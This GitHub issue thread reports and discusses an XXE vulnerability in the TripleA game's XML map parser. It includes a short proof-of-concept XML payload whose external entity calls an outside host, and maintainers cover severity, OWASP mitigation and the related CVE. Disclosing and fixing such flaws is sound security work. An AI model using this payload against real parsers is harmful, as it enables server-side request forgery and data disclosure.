### ISSUE TITLE
XXE in Game Parser

### ISSUE THREAD

**Issue by ProDigySML** [triplea-game/triplea#3442]
# The Issue
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

# Where the Issue Occured
https://github.com/triplea-game/triplea/blob/43ad70c34566632266d6f8c01a7df4204b87248f/game-core/src/main/java/games/strategy/engine/data/GameParser.java#L319
The above code parses a game file.

A sample game file can be found at:
https://github.com/triplea-game/triplea/blob/master/game-core/src/test/resources/GameExample.xml

To exploit this issue, import the following XML code:
```xml
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://0dd.zone">
]>
<r>&sp;</r>
```

**Comment by RoiEXLab** [comment]
@DanVanAtta @ssoloff @ron-murhammer This issue should be fairly easy to fix.
This is not a severe issue because we don't just arbitrarily load xmls into the game and download them via HTTPS.
The only potential security risk comes from players themselves that get tricked into installing malicious maps.

**Comment by ProDigySML** [comment]
Yeah, agreed. It's not very severe at all. More a 'good to fix' issue.

**Comment by RoiEXLab** [comment]
[Fix instructions](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#JAXP_DocumentBuilderFactory.2C_SAXParserFactory_and_DOM4J)

**Comment by RoiEXLab** [comment]
@ProDigySML Thanks for reporting this issue btw.

**Comment by RoiEXLab** [comment]
Unfortunately we don't have a P2 label ^^

**Comment by DanVanAtta** [comment]
Downgrading priority label given this statement:
> This is not a severe issue because we don't just arbitrarily load xmls into the game and download them via HTTPS.

**Comment by tvleavitt** [comment]
https://security-tracker.debian.org/tracker/CVE-2018-1000546

Having a CVE specific to your application is bad. Having one unaddressed for over six months is very bad optics. Even if it does require the user to be tricked into installing a malicious map (really, that's not terribly difficult).

**Comment by RoiEXLab** [comment]
Turns out this really is a non-issue.
The default JVM implementation already processes XMLs securely: I modified a map file to be just the provided example. Of course the parser complains because the XML is not as expected, but without changing anything, no connection to http://0dd.zone was opened.
After digging into the code, I realized that the secure flag was already set to true (even though the javadocs told me otherwise)
![Initial setting](https://user-images.githubusercontent.com/8350879/50724858-7c00c280-10f4-11e9-9334-59742ec5bca4.png)

Only by manually setting this flag to `false` I could verify in Wireshark, that a connection was made. By removing the explicit setting, as expected no connection was opened.

Anyways. I opened #4516 to have this feature set without having to rely on the implementation.

**Comment by RoiEXLab** [comment]
Ok. Apparently setting the flag explicitly does change the behaviour slightly.
When the flag is explicitly set, the xml parser doesn't load external DTDs anymore, which is currently required for our maps (although we really should restrict this to the directory where this file is kept, relative paths should still be able to escape even though we probably don't want this).

Not sure what to do about this currently. I guess having protection from HTTP request is sufficient for now?

**Comment by ssoloff** [comment]
> The default JVM implementation already processes XMLs securely

Sounds like this may be platform- or JVM-specific because I'm assuming the OP ran a test to verify the external entity was opened.  @ProDigySML, do you happen to remember on which platform(s) and JVM implementation(s) you observed this exploit?

**Comment by tvleavitt** [comment]
My only comment would be that some process should be in place to notify the Debian package manager that the CVE has been corrected, and see if we can get the package updated, or the change back ported to the released package in their repo (not sure how that works).
